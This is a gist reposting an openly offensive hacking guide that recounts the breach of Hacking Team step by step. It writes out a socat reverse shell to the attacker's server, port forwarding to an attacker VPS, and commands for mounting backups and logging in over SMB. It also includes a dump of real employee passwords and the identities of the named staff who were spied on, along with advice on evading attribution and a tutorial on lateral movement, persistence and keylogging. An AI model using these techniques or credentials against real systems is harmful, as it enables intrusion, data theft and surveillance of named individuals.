Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save jaredsburrows/9e121d2e5f1147ab12a696cf548b90b0 to your computer and use it in GitHub Desktop.
Save jaredsburrows/9e121d2e5f1147ab12a696cf548b90b0 to your computer and use it in GitHub Desktop.

Revisions

  1. jaredsburrows created this gist Apr 18, 2016.
    925 changes: 925 additions & 0 deletions gistfile1.txt
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,925 @@
    _ _ _ ____ _ _
    | | | | __ _ ___| | __ | __ ) __ _ ___| | _| |
    | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / |
    | _ | (_| | (__| < | |_) | (_| | (__| <|_|
    |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

    A DIY Guide



    ,-._,-._
    _,-\ o O_/;
    / , ` `|
    | \-.,___, / `
    \ `-.__/ / ,.\
    / `-.__.-\` ./ \'
    / /| ___\ ,/ `\
    ( ( |.-"` '/\ \ `
    \ \/ ,, | \ _
    \| o/o / \.
    \ , / /
    ( __`;-;'__`) \\
    `//'` `||` `\
    _// || __ _ _ _____ __
    .-"-._,(__) .(__).-""-. | | | | |_ _| |
    / \ / \ | | |_| | | | |
    \ / \ / | | _ | | | |
    `'-------` `--------'` __| |_| |_| |_| |__
    #antisec



    --[ 1 - Introduction ]----------------------------------------------------------

    You'll notice the change in language since the last edition [1]. The
    English-speaking world already has tons of books, talks, guides, and
    info about hacking. In that world, there's plenty of hackers better than me,
    but they misuse their talents working for "defense" contractors, for intelligence
    agencies, to protect banks and corporations, and to defend the status quo.
    Hacker culture was born in the US as a counterculture, but that origin only
    remains in its aesthetics - the rest has been assimilated. At least they can
    wear a t-shirt, dye their hair blue, use their hacker names, and feel like
    rebels while they work for the Man.

    You used to have to sneak into offices to leak documents [2]. You used to need
    a gun to rob a bank. Now you can do both from bed with a laptop in hand [3][4].
    Like the CNT said after the Gamma Group hack: "Let's take a step forward with
    new forms of struggle" [5]. Hacking is a powerful tool, let's learn and fight!

    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] https://en.wikipedia.org/wiki/Citizens%27_Commission_to_Investigate_the_FBI
    [3] http://www.aljazeera.com/news/2015/09/algerian-hacker-hero-hoodlum-150921083914167.html
    [4] https://securelist.com/files/2015/02/Carbanak_APT_eng.pdf
    [5] http://madrid.cnt.es/noticia/consideraciones-sobre-el-ataque-informatico-a-gamma-group


    --[ 2 - Hacking Team ]----------------------------------------------------------

    Hacking Team was a company that helped governments hack and spy on
    journalists, activists, political opposition, and other threats to their power
    [1][2][3][4][5][6][7][8][9][10][11]. And, occasionally, on actual criminals
    and terrorists [12]. Vincenzetti, the CEO, liked to end his emails with the
    fascist slogan "boia chi molla". It'd be more correct to say "boia chi vende
    RCS". They also claimed to have technology to solve the "problem" posed by Tor
    and the darknet [13]. But seeing as I'm still free, I have my doubts about
    its effectiveness.

    [1] http://www.animalpolitico.com/2015/07/el-gobierno-de-puebla-uso-el-software-de-hacking-team-para-espionaje-politico/
    [2] http://www.prensa.com/politica/claves-entender-Hacking-Team-Panama_0_4251324994.html
    [3] http://www.24-horas.mx/ecuador-espio-con-hacking-team-a-opositor-carlos-figueroa/
    [4] https://citizenlab.org/2012/10/backdoors-are-forever-hacking-team-and-the-targeting-of-dissent/
    [5] https://citizenlab.org/2014/02/hacking-team-targeting-ethiopian-journalists/
    [6] https://citizenlab.org/2015/03/hacking-team-reloaded-us-based-ethiopian-journalists-targeted-spyware/
    [7] http://focusecuador.net/2015/07/08/hacking-team-rodas-paez-tiban-torres-son-espiados-en-ecuador/
    [8] http://www.pri.org/stories/2015-07-08/these-ethiopian-journalists-exile-hacking-team-revelations-are-personal
    [9] https://theintercept.com/2015/07/07/leaked-documents-confirm-hacking-team-sells-spyware-repressive-countries/
    [10] http://www.wired.com/2013/06/spy-tool-sold-to-governments/
    [11] http://www.theregister.co.uk/2015/07/13/hacking_team_vietnam_apt/
    [12] http://www.ilmessaggero.it/primopiano/cronaca/yara_bossetti_hacking_team-1588888.html
    [13] http://motherboard.vice.com/en_ca/read/hacking-team-founder-hey-fbi-we-can-help-you-crack-the-dark-web


    --[ 3 - Stay safe out there ]---------------------------------------------------

    Unfortunately, our world is backwards. You get rich by doing bad things and go
    to jail for doing good. Fortunately, thanks to the hard work of people like
    the Tor project [1], you can avoid going to jail by taking a few simple
    precautions:

    1) Encrypt your hard disk [2]

    I guess when the police arrive to seize your computer, it means you've
    already made a lot of mistakes, but it's better to be safe.

    2) Use a virtual machine with all traffic routed through Tor

    This accomplishes two things. First, all your traffic is anonymized through
    Tor. Second, keeping your personal life and your hacking on separate
    computers helps you not to mix them by accident.

    You can use projects like Whonix [3], Tails [4], Qubes TorVM [5], or
    something custom [6]. Here's [7] a detailed comparison.

    3) (Optional) Don't connect directly to Tor

    Tor isn't a panacea. They can correlate the times you're connected to Tor
    with the times your hacker handle is active. Also, there have been
    successful attacks against Tor [8]. You can connect to Tor using other
    peoples' wifi. Wifislax [9] is a linux distro with a lot of tools for
    cracking wifi. Another option is to connect to a VPN or a bridge node [10]
    before Tor, but that's less secure because they can still correlate the
    hacker's activity with your house's internet activity (this was used as
    evidence against Jeremy Hammond [11]).

    The reality is that while Tor isn't perfect, it works quite well. When I
    was young and reckless, I did plenty of stuff without any protection (I'm
    referring to hacking) apart from Tor, that the police tried their hardest
    to investigate, and I've never had any problems.

    [1] https://www.torproject.org/
    [2] https://info.securityinabox.org/es/chapter-4
    [3] https://www.whonix.org/
    [4] https://tails.boum.org/
    [5] https://www.qubes-os.org/doc/privacy/torvm/
    [6] https://trac.torproject.org/projects/tor/wiki/doc/TransparentProxy
    [7] https://www.whonix.org/wiki/Comparison_with_Others
    [8] https://blog.torproject.org/blog/tor-security-advisory-relay-early-traffic-confirmation-attack/
    [9] http://www.wifislax.com/
    [10] https://www.torproject.org/docs/bridges.html.en
    [11] http://www.documentcloud.org/documents/1342115-timeline-correlation-jeremy-hammond-and-anarchaos.html


    ----[ 3.1 - Infrastructure ]----------------------------------------------------

    I don't hack directly from Tor exit nodes. They're on blacklists, they're
    slow, and they can't receive connect-backs. Tor protects my anonymity while I
    connect to the infrastructure I use to hack, which consists of:

    1) Domain Names

    For C&C addresses, and for DNS tunnels for guaranteed egress.

    2) Stable Servers

    For use as C&C servers, to receive connect-back shells, to launch attacks,
    and to store the loot.

    3) Hacked Servers

    For use as pivots to hide the IP addresses of the stable servers. And for
    when I want a fast connection without pivoting, for example to scan ports,
    scan the whole internet, download a database with sqli, etc.

    Obviously, you have to use an anonymous payment method, like bitcoin (if it's
    used carefully).


    ----[ 3.2 - Attribution ]-------------------------------------------------------

    In the news we often see attacks traced back to government-backed hacking
    groups ("APTs"), because they repeatedly use the same tools, leave the same
    footprints, and even use the same infrastructure (domains, emails, etc).
    They're negligent because they can hack without legal consequences.

    I didn't want to make the police's work any easier by relating my hack of
    Hacking Team with other hacks I've done or with names I use in my day-to-day
    work as a blackhat hacker. So, I used new servers and domain names, registered
    with new emails, and payed for with new bitcoin addresses. Also, I only used
    tools that are publicly available, or things that I wrote specifically for
    this attack, and I changed my way of doing some things to not leave my usual
    forensic footprint.


    --[ 4 - Information Gathering ]-------------------------------------------------

    Although it can be tedious, this stage is very important, since the larger the
    attack surface, the easier it is to find a hole somewhere in it.


    ----[ 4.1 - Technical Information ]---------------------------------------------

    Some tools and techniques are:

    1) Google

    A lot of interesting things can be found with a few well-chosen search
    queries. For example, the identity of DPR [1]. The bible of Google hacking
    is the book "Google Hacking for Penetration Testers". You can find a short
    summary in Spanish at [2].

    2) Subdomain Enumeration

    Often, a company's main website is hosted by a third party, and you'll find
    the company's actual IP range thanks to subdomains like mx.company.com or
    ns1.company.com. Also, sometimes there are things that shouldn't be exposed
    in "hidden" subdomains. Useful tools for discovering domains and subdomains
    are fierce [3], theHarvester [4], and recon-ng [5].

    3) Whois lookups and reverse lookups

    With a reverse lookup using the whois information from a domain or IP range
    of a company, you can find other domains and IP ranges. As far as I know,
    there's no free way to do reverse lookups aside from a google "hack":

    "via della moscova 13" site:www.findip-address.com
    "via della moscova 13" site:domaintools.com

    4) Port scanning and fingerprinting

    Unlike the other techniques, this talks to the company's servers. I
    include it in this section because it's not an attack, it's just
    information gathering. The company's IDS might generate an alert, but you
    don't have to worry since the whole internet is being scanned constantly.

    For scanning, nmap [6] is precise, and can fingerprint the majority of
    services discovered. For companies with very large IP ranges, zmap [7] or
    masscan [8] are fast. WhatWeb [9] or BlindElephant [10] can fingerprint web
    sites.

    [1] http://www.nytimes.com/2015/12/27/business/dealbook/the-unsung-tax-agent-who-put-a-face-on-the-silk-road.html
    [2] http://web.archive.org/web/20140610083726/http://www.soulblack.com.ar/repo/papers/hackeando_con_google.pdf
    [3] http://ha.ckers.org/fierce/
    [4] https://github.com/laramies/theHarvester
    [5] https://bitbucket.org/LaNMaSteR53/recon-ng
    [6] https://nmap.org/
    [7] https://zmap.io/
    [8] https://github.com/robertdavidgraham/masscan
    [9] http://www.morningstarsecurity.com/research/whatweb
    [10] http://blindelephant.sourceforge.net/


    ----[ 4.2 - Social Information ]------------------------------------------------

    For social engineering, it's useful to have information about the employees,
    their roles, contact information, operating system, browser, plugins,
    software, etc. Some resources are:

    1) Google

    Here as well, it's the most useful tool.

    2) theHarvester and recon-ng

    I already mentioned them in the previous section, but they have a lot more
    functionality. They can find a lot of information quickly and
    automatically. It's worth reading all their documentation.

    3) LinkedIn

    A lot of information about the employees can be found here. The company's
    recruiters are the most likely to accept your connection requests.

    4) Data.com

    Previously known as jigsaw. They have contact information for many
    employees.

    5) File Metadata

    A lot of information about employees and their systems can be found in
    metadata of files the company has published. Useful tools for finding
    files on the company's website and extracting the metadata are metagoofil
    [1] and FOCA [2].

    [1] https://github.com/laramies/metagoofil
    [2] https://www.elevenpaths.com/es/labstools/foca-2/index.html


    --[ 5 - Entering the network ]--------------------------------------------------

    There are various ways to get a foothold. Since the method I used against
    Hacking Team is uncommon and a lot more work than is usually necessary, I'll
    talk a little about the two most common ways, which I recommend trying first.


    ----[ 5.1 - Social Engineering ]------------------------------------------------

    Social engineering, specifically spear phishing, is responsible for the
    majority of hacks these days. For an introduction in Spanish, see [1]. For
    more information in English, see [2] (the third part, "Targeted Attacks"). For
    fun stories about the social engineering exploits of past generations, see
    [3]. I didn't want to try to spear phish Hacking Team, as their whole business
    is helping governments spear phish their opponents, so they'd be much more
    likely to recognize and investigate a spear phishing attempt.

    [1] http://www.hacknbytes.com/2016/01/apt-pentest-con-empire.html
    [2] http://blog.cobaltstrike.com/2015/09/30/advanced-threat-tactics-course-and-notes/
    [3] http://www.netcomunity.com/lestertheteacher/doc/ingsocial1.pdf


    ----[ 5.2 - Buying Access ]-----------------------------------------------------

    Thanks to hardworking Russians and their exploit kits, traffic sellers, and
    bot herders, many companies already have compromised computers in their
    networks. Almost all of the Fortune 500, with their huge networks, have some
    bots already inside. However, Hacking Team is a very small company, and most
    of it's employees are infosec experts, so there was a low chance that they'd
    already been compromised.


    ----[ 5.3 - Technical Exploitation ]--------------------------------------------

    After the Gamma Group hack, I described a process for searching for
    vulnerabilities [1]. Hacking Team had one public IP range:
    inetnum: 93.62.139.32 - 93.62.139.47
    descr: HT public subnet

    Hacking Team had very little exposed to the internet. For example, unlike
    Gamma Group, their customer support site needed a client certificate to
    connect. What they had was their main website (a Joomla blog in which Joomscan
    [2] didn't find anything serious), a mail server, a couple routers, two VPN
    appliances, and a spam filtering appliance. So, I had three options: look for
    a 0day in Joomla, look for a 0day in postfix, or look for a 0day in one of the
    embedded devices. A 0day in an embedded device seemed like the easiest option,
    and after two weeks of work reverse engineering, I got a remote root exploit.
    Since the vulnerabilities still haven't been patched, I won't give more
    details, but for more information on finding these kinds of vulnerabilities,
    see [3] and [4].

    [1] http://pastebin.com/raw.php?i=cRYvK4jb
    [2] http://sourceforge.net/projects/joomscan/
    [3] http://www.devttys0.com/
    [4] https://docs.google.com/presentation/d/1-mtBSka1ktdh8RHxo2Ft0oNNlIp7WmDA2z9zzHpon8A


    --[ 6 - Be Prepared ]-----------------------------------------------------------

    I did a lot of work and testing before using the exploit against Hacking Team.
    I wrote a backdoored firmware, and compiled various post-exploitation tools
    for the embedded device. The backdoor serves to protect the exploit. Using the
    exploit just once and then returning through the backdoor makes it harder to
    identify and patch the vulnerabilities.

    The post-exploitation tools that I'd prepared were:

    1) busybox

    For all the standard Unix utilities that the system didn't have.

    2) nmap

    To scan and fingerprint Hacking Team's internal network.

    3) Responder.py

    The most useful tool for attacking windows networks when you have access to
    the internal network, but no domain user.

    4) Python

    To execute Responder.py

    5) tcpdump

    For sniffing traffic.

    6) dsniff

    For sniffing passwords from plaintext protocols like ftp, and for
    arpspoofing. I wanted to use ettercap, written by Hacking Team's own ALoR
    and NaGA, but it was hard to compile it for the system.

    7) socat

    For a comfortable shell with a pty:
    my_server: socat file:`tty`,raw,echo=0 tcp-listen:my_port
    hacked box: socat exec:'bash -li',pty,stderr,setsid,sigint,sane \
    tcp:my_server:my_port

    And useful for a lot more, it's a networking swiss army knife. See the
    examples section of its documentation.

    8) screen

    Like the shell with pty, it wasn't really necessary, but I wanted to feel
    at home in Hacking Team's network.

    9) a SOCKS proxy server

    To use with proxychains to be able to access their local network from any
    program.

    10) tgcd

    For forwarding ports, like for the SOCKS server, through the firewall.

    [1] https://www.busybox.net/
    [2] https://nmap.org/
    [3] https://github.com/SpiderLabs/Responder
    [4] https://github.com/bendmorris/static-python
    [5] http://www.tcpdump.org/
    [6] http://www.monkey.org/~dugsong/dsniff/
    [7] http://www.dest-unreach.org/socat/
    [8] https://www.gnu.org/software/screen/
    [9] http://average-coder.blogspot.com/2011/09/simple-socks5-server-in-c.html
    [10] http://tgcd.sourceforge.net/


    The worst thing that could happen would be for my backdoor or post-exploitation
    tools to make the system unstable and cause an employee to investigate. So I
    spent a week testing my exploit, backdoor, and post-exploitation tools in the
    networks of other vulnerable companies before entering Hacking Team's network.


    --[ 7 - Watch and Listen ]------------------------------------------------------

    Now inside their internal network, I wanted to take a look around and think
    about my next step. I started Responder.py in analysis mode (-A to listen
    without sending poisoned responses), and did a slow scan with nmap.


    --[ 8 - NoSQL Databases ]-------------------------------------------------------

    NoSQL, or rather NoAuthentication, has been a huge gift to the hacker
    community [1]. Just when I was worried that they'd finally patched all of the
    authentication bypass bugs in MySQL [2][3][4][5], new databases came into
    style that lack authentication by design. Nmap found a few in Hacking Team's
    internal network:

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    | ok = 1
    | totalSizeMb = 47547
    | totalSize = 49856643072
    ...
    |_ version = 2.6.5

    27017/tcp open mongodb MongoDB 2.6.5
    | mongodb-databases:
    | ok = 1
    | totalSizeMb = 31987
    | totalSize = 33540800512
    | databases
    ...
    |_ version = 2.6.5

    They were the databases for test instances of RCS. The audio that RCS records
    is stored in MongoDB with GridFS. The audio folder in the torrent [6] came
    from this. They were spying on themselves without meaning to.

    [1] https://www.shodan.io/search?query=product%3Amongodb
    [2] https://community.rapid7.com/community/metasploit/blog/2012/06/11/cve-2012-2122-a-tragically-comedic-security-flaw-in-mysql
    [3] http://archives.neohapsis.com/archives/vulnwatch/2004-q3/0001.html
    [4] http://downloads.securityfocus.com/vulnerabilities/exploits/hoagie_mysql.c
    [5] http://archives.neohapsis.com/archives/bugtraq/2000-02/0053.html
    [6] https://ht.transparencytoolkit.org/audio/


    --[ 9 - Crossed Cables ]--------------------------------------------------------

    Although it was fun to listen to recordings and see webcam images of Hacking
    Team developing their malware, it wasn't very useful. Their insecure backups
    were the vulnerability that opened their doors. According to their
    documentation [1], their iSCSI devices were supposed to be on a separate
    network, but nmap found a few in their subnetwork 192.168.1.200/24:

    Nmap scan report for ht-synology.hackingteam.local (192.168.200.66)
    ...
    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:ht-synology.name
    | Address: 192.168.200.66:3260,0
    |_ Authentication: No authentication required

    Nmap scan report for synology-backup.hackingteam.local (192.168.200.72)
    ...
    3260/tcp open iscsi?
    | iscsi-info:
    | Target: iqn.2000-01.com.synology:synology-backup.name
    | Address: 10.0.1.72:3260,0
    | Address: 192.168.200.72:3260,0
    |_ Authentication: No authentication required

    iSCSI needs a kernel module, and it would've been difficult to compile it for
    the embedded system. I forwarded the port so that I could mount it from a VPS:

    VPS: tgcd -L -p 3260 -q 42838
    Embedded system: tgcd -C -s 192.168.200.72:3260 -c VPS_IP:42838

    VPS: iscsiadm -m discovery -t sendtargets -p 127.0.0.1

    Now iSCSI finds the name iqn.2000-01.com.synology but has problems mounting it
    because it thinks its IP is 192.168.200.72 instead of 127.0.0.1

    The way I solved it was:
    iptables -t nat -A OUTPUT -d 192.168.200.72 -j DNAT --to-destination 127.0.0.1

    And now, after:
    iscsiadm -m node --targetname=iqn.2000-01.com.synology:synology-backup.name -p 192.168.200.72 --login

    ...the device file appears! We mount it:
    vmfs-fuse -o ro /dev/sdb1 /mnt/tmp

    and find backups of various virtual machines. The Exchange server seemed like
    the most interesting. It was too big too download, but it was possible to
    mount it remotely to look for interesting files:
    $ losetup /dev/loop0 Exchange.hackingteam.com-flat.vmdk
    $ fdisk -l /dev/loop0
    /dev/loop0p1 2048 1258287103 629142528 7 HPFS/NTFS/exFAT

    so the offset is 2048 * 512 = 1048576
    $ losetup -o 1048576 /dev/loop1 /dev/loop0
    $ mount -o ro /dev/loop1 /mnt/exchange/

    now in /mnt/exchange/WindowsImageBackup/EXCHANGE/Backup 2014-10-14 172311
    we find the hard disk of the VM, and mount it:
    vdfuse -r -t VHD -f f0f78089-d28a-11e2-a92c-005056996a44.vhd /mnt/vhd-disk/
    mount -o loop /mnt/vhd-disk/Partition1 /mnt/part1

    ...and finally we've unpacked the Russian doll and can see all the files from
    the old Exchange server in /mnt/part1

    [1] https://ht.transparencytoolkit.org/FileServer/FileServer/Hackingteam/InfrastrutturaIT/Rete/infrastruttura%20ht.pdf


    --[ 10 - From backups to domain admin ]-----------------------------------------

    What interested me most in the backup was seeing if it had a password or hash
    that could be used to access the live server. I used pwdump, cachedump, and
    lsadump [1] on the registry hives. lsadump found the password to the besadmin
    service account:

    _SC_BlackBerry MDS Connection Service
    0000 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
    0010 62 00 65 00 73 00 33 00 32 00 36 00 37 00 38 00 b.e.s.3.2.6.7.8.
    0020 21 00 21 00 21 00 00 00 00 00 00 00 00 00 00 00 !.!.!...........

    I used proxychains [2] with the socks server on the embedded device and
    smbclient [3] to check the password:
    proxychains smbclient '//192.168.100.51/c$' -U 'hackingteam.local/besadmin%bes32678!!!'

    It worked! The password for besadmin was still valid, and a local admin. I
    used my proxy and metasploit's psexec_psh [4] to get a meterpreter session.
    Then I migrated to a 64 bit process, ran "load kiwi" [5], "creds_wdigest", and
    got a bunch of passwords, including the Domain Admin:

    HACKINGTEAM BESAdmin bes32678!!!
    HACKINGTEAM Administrator uu8dd8ndd12!
    HACKINGTEAM c.pozzi P4ssword <---- lol great sysadmin
    HACKINGTEAM m.romeo ioLK/(90
    HACKINGTEAM l.guerra 4luc@=.=
    HACKINGTEAM d.martinez W4tudul3sp
    HACKINGTEAM g.russo GCBr0s0705!
    HACKINGTEAM a.scarafile Cd4432996111
    HACKINGTEAM r.viscardi Ht2015!
    HACKINGTEAM a.mino A!e$$andra
    HACKINGTEAM m.bettini Ettore&Bella0314
    HACKINGTEAM m.luppi Blackou7
    HACKINGTEAM s.gallucci 1S9i8m4o!
    HACKINGTEAM d.milan set!dob66
    HACKINGTEAM w.furlan Blu3.B3rry!
    HACKINGTEAM d.romualdi Rd13136f@#
    HACKINGTEAM l.invernizzi L0r3nz0123!
    HACKINGTEAM e.ciceri 2O2571&2E
    HACKINGTEAM e.rabe erab@4HT!

    [1] https://github.com/Neohapsis/creddump7
    [2] http://proxychains.sourceforge.net/
    [3] https://www.samba.org/
    [4] http://ns2.elhacker.net/timofonica/manuales/Manual_de_Metasploit_Unleashed.pdf
    [5] https://github.com/gentilkiwi/mimikatz


    --[ 11 - Downloading the mail ]-------------------------------------------------

    With the Domain Admin password, I have access to the email, the heart of the
    company. Since with each step I take there's a chance of being detected, I
    start downloading their email before continuing to explore. Powershell makes
    it easy [1]. Curiously, I found a bug with Powershell's date handling. After
    downloading the emails, it took me another couple weeks to get access to the
    source code and everything else, so I returned every now and then to download
    the new emails. The server was Italian, with dates in the format
    day/month/year. I used:
    -ContentFilter {(Received -ge '05/06/2015') -or (Sent -ge '05/06/2015')}

    with New-MailboxExportRequest to download the new emails (in this case all
    mail since June 5). The problem is it says the date is invalid if you
    try a day larger than 12 (I imagine because in the US the month comes first
    and you can't have a month above 12). It seems like Microsoft's engineers only
    test their software with their own locale.

    [1] http://www.stevieg.org/2010/07/using-the-exchange-2010-sp1-mailbox-export-features-for-mass-exports-to-pst/


    --[ 12 - Downloading Files ]----------------------------------------------------

    Now that I'd gotten Domain Admin, I started to download file shares using my
    proxy and the -Tc option of smbclient, for example:

    proxychains smbclient '//192.168.1.230/FAE DiskStation' \
    -U 'HACKINGTEAM/Administrator%uu8dd8ndd12!' -Tc FAE_DiskStation.tar '*'

    I downloaded the Amministrazione, FAE DiskStation, and FileServer folders in
    the torrent like that.


    --[ 13 - Introduction to hacking windows domains ]------------------------------

    Before continuing with the story of the "weones culiaos" (Hacking Team), I
    should give some general knowledge for hacking windows networks.


    ----[ 13.1 - Lateral Movement ]-------------------------------------------------

    I'll give a brief review of the different techniques for spreading withing a
    windows network. The techniques for remote execution require the password or
    hash of a local admin on the target. By far, the most common way of obtaining
    those credentials is using mimikatz [1], especially sekurlsa::logonpasswords
    and sekurlsa::msv, on the computers where you already have admin access. The
    techniques for "in place" movement also require administrative privileges
    (except for runas). The most important tools for privilege escalation are
    PowerUp [2], and bypassuac [3].

    [1] https://adsecurity.org/?page_id=1821
    [2] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp
    [3] https://github.com/PowerShellEmpire/Empire/blob/master/data/module_source/privesc/Invoke-BypassUAC.ps1


    Remote Movement:

    1) psexec

    The tried and true method for lateral movement on windows. You can use
    psexec [1], winexe [2], metasploit's psexec_psh [3], Powershell Empire's
    invoke_psexec [4], or the builtin windows command "sc" [5]. For the
    metasploit module, powershell empire, and pth-winexe [6], you just need the
    hash, not the password. It's the most universal method (it works on any
    windows computer with port 445 open), but it's also the least stealthy.
    Event type 7045 "Service Control Manager" will appear in the event logs. In
    my experience, no one has ever noticed during a hack, but it helps the
    investigators piece together what the hacker did afterwards.

    2) WMI

    The most stealthy method. The WMI service is enabled on all windows
    computers, but except for servers, the firewall blocks it by default. You
    can use wmiexec.py [7], pth-wmis [6] (here's a demonstration of wmiexec and
    pth-wmis [8]), Powershell Empire's invoke_wmi [9], or the windows builtin
    wmic [5]. All except wmic just need the hash.

    3) PSRemoting [10]

    It's disabled by default, and I don't recommend enabling new protocols.
    But, if the sysadmin has already enabled it, it's very convenient,
    especially if you use powershell for everything (and you should use
    powershell for almost everything, it will change [11] with powershell 5 and
    windows 10, but for now powershell makes it easy to do everything in RAM,
    avoid AV, and leave a small footprint)

    4) Scheduled Tasks

    You can execute remote programs with at and schtasks [5]. It works in the
    same situations where you could use psexec, and it also leaves a well known
    footprint [12].

    5) GPO

    If all those protocols are disabled or blocked by the firewall, once you're
    Domain Admin, you can use GPO to give users a login script, install an msi,
    execute a scheduled task [13], or, like we'll see with the computer of
    Mauro Romeo (one of Hacking Team's sysadmins), use GPO to enable WMI and
    open the firewall.

    [1] https://technet.microsoft.com/en-us/sysinternals/psexec.aspx
    [2] https://sourceforge.net/projects/winexe/
    [3] https://www.rapid7.com/db/modules/exploit/windows/smb/psexec_psh
    [4] http://www.powershellempire.com/?page_id=523
    [5] http://blog.cobaltstrike.com/2014/04/30/lateral-movement-with-high-latency-cc/
    [6] https://github.com/byt3bl33d3r/pth-toolkit
    [7] https://github.com/CoreSecurity/impacket/blob/master/examples/wmiexec.py
    [8] https://www.trustedsec.com/june-2015/no_psexec_needed/
    [9] http://www.powershellempire.com/?page_id=124
    [10] http://www.maquinasvirtuales.eu/ejecucion-remota-con-powershell/
    [11] https://adsecurity.org/?p=2277
    [12] https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
    [13] https://github.com/PowerShellEmpire/Empire/blob/master/lib/modules/lateral_movement/new_gpo_immediate_task.py


    "In place" Movement:

    1) Token Stealing

    Once you have admin access on a computer, you can use the tokens of the
    other users to access resources in the domain. Two tools for doing this are
    incognito [1] and the mimikatz token::* commands [2].

    2) MS14-068

    You can take advantage of a validation bug in Kerberos to generate Domain
    Admin tickets [3][4][5].

    3) Pass the Hash

    If you have a user's hash, but they're not logged in, you can use
    sekurlsa::pth [2] to get a ticket for the user.

    4) Process Injection

    Any RAT can inject itself into other processes. For example, the migrate
    command in meterpreter and pupy [6], or the psinject [7] command in
    powershell empire. You can inject into the process that has the token you
    want.

    5) runas

    This is sometimes very useful since it doesn't require admin privileges.
    The command is part of windows, but if you don't have a GUI you can use
    powershell [8].

    [1] https://www.indetectables.net/viewtopic.php?p=211165
    [2] https://adsecurity.org/?page_id=1821
    [3] https://github.com/bidord/pykek
    [4] https://adsecurity.org/?p=676
    [5] http://www.hackplayers.com/2014/12/CVE-2014-6324-como-validarse-con-cualquier-usuario-como-admin.html
    [6] https://github.com/n1nj4sec/pupy
    [7] http://www.powershellempire.com/?page_id=273
    [8] https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/Invoke-Runas.ps1


    ----[ 13.2 - Persistence ]------------------------------------------------------

    Once you have access, you want to keep it. Really, persistence is only a
    challenge for assholes like Hacking Team who target activists and other
    individuals. To hack companies, persistence isn't needed since companies never
    sleep. I always use Duqu 2 style "persistence", executing in RAM on a couple
    high-uptime servers. On the off chance that they all reboot at the same time,
    I have passwords and a golden ticket [1] as backup access. You can read more
    about the different techniques for persistence in windows here [2][3][4]. But
    for hacking companies, it's not needed and it increases the risk of detection.

    [1] http://blog.cobaltstrike.com/2014/05/14/meterpreter-kiwi-extension-golden-ticket-howto/
    [2] http://www.harmj0y.net/blog/empire/nothing-lasts-forever-persistence-with-empire/
    [3] http://www.hexacorn.com/blog/category/autostart-persistence/
    [4] https://blog.netspi.com/tag/persistence/


    ----[ 13.3 - Internal reconnaissance ]------------------------------------------

    The best tool these days for understanding windows networks is Powerview [1].
    It's worth reading everything written by it's author [2], especially [3], [4],
    [5], and [6]. Powershell itself is also quite powerful [7]. As there are still
    many windows 2000 and 2003 servers without powershell, you also have to learn
    the old school [8], with programs like netview.exe [9] or the windows builtin
    "net view". Other techniques that I like are:

    1) Downloading a list of file names

    With a Domain Admin account, you can download a list of all filenames in
    the network with powerview:

    Invoke-ShareFinderThreaded -ExcludedShares IPC$,PRINT$,ADMIN$ |
    select-string '^(.*) \t-' | %{dir -recurse $_.Matches[0].Groups[1] |
    select fullname | out-file -append files.txt}

    Later, you can read it at your leisure and choose which files to download.

    2) Reading email

    As we've already seen, you can download email with powershell, and it has a
    lot of useful information.

    3) Reading sharepoint

    It's another place where many businesses store a lot of important
    information. It can also be downloaded with powershell [10].

    4) Active Directory [11]

    It has a lot of useful information about users and computers. Without being
    Domain Admin, you can already get a lot of info with powerview and other
    tools [12]. After getting Domain Admin, you should export all the AD
    information with csvde or another tool.

    5) Spy on the employees

    One of my favorite hobbies is hunting sysadmins. Spying on Christian Pozzi
    (one of Hacking Team's sysadmins) gave me access to a Nagios server which
    gave me access to the rete sviluppo (development network with the source
    code of RCS). With a simple combination of Get-Keystrokes and
    Get-TimedScreenshot from PowerSploit [13], Do-Exfiltration from nishang
    [14], and GPO, you can spy on any employee, or even on the whole domain.

    [1] https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
    [2] http://www.harmj0y.net/blog/tag/powerview/
    [3] http://www.harmj0y.net/blog/powershell/veil-powerview-a-usage-guide/
    [4] http://www.harmj0y.net/blog/redteaming/powerview-2-0/
    [5] http://www.harmj0y.net/blog/penetesting/i-hunt-sysadmins/
    [6] http://www.slideshare.net/harmj0y/i-have-the-powerview
    [7] https://adsecurity.org/?p=2535
    [8] https://www.youtube.com/watch?v=rpwrKhgMd7E
    [9] https://github.com/mubix/netview
    [10] https://blogs.msdn.microsoft.com/rcormier/2013/03/30/how-to-perform-bulk-downloads-of-files-in-sharepoint/
    [11] https://adsecurity.org/?page_id=41
    [12] http://www.darkoperator.com/?tag=Active+Directory
    [13] https://github.com/PowerShellMafia/PowerSploit
    [14] https://github.com/samratashok/nishang


    --[ 14 - Hunting Sysadmins ]----------------------------------------------------

    Reading their documentation about their infrastructure [1], I saw that I was
    still missing access to something important - the "Rete Sviluppo", an isolated
    network with the source code for RCS. The sysadmins of a company always have
    access to everything, so I searched the computers of Mauro Romeo and Christian
    Pozzi to see how they administer the Sviluppo network, and to see if there
    were any other interesting systems I should investigate. It was simple to
    access their computers, since they were part of the windows domain where I'd
    already gotten admin access. Mauro Romeo's computer didn't have any ports
    open, so I opened the port for WMI [2] and executed meterpreter [3]. In
    addition to keylogging and screen scraping with Get-Keystrokes and
    Get-TimeScreenshot, I used many /gather/ modules from metasploit, CredMan.ps1
    [4], and searched for interesting files [5]. Upon seeing that Pozzi had a
    Truecrypt volume, I waited until he'd mounted it and then copied off the
    files. Many have made fun of Christian Pozzi's weak passwords (and of
    Christian Pozzi in general, he provides plenty of material [6][7][8][9]). I
    included them in the leak as a false clue, and to laugh at him. The reality is
    that mimikatz and keyloggers view all passwords equally.

    [1] http://hacking.technology/Hacked%20Team/FileServer/FileServer/Hackingteam/InfrastrutturaIT/
    [2] http://www.hammer-software.com/wmigphowto.shtml
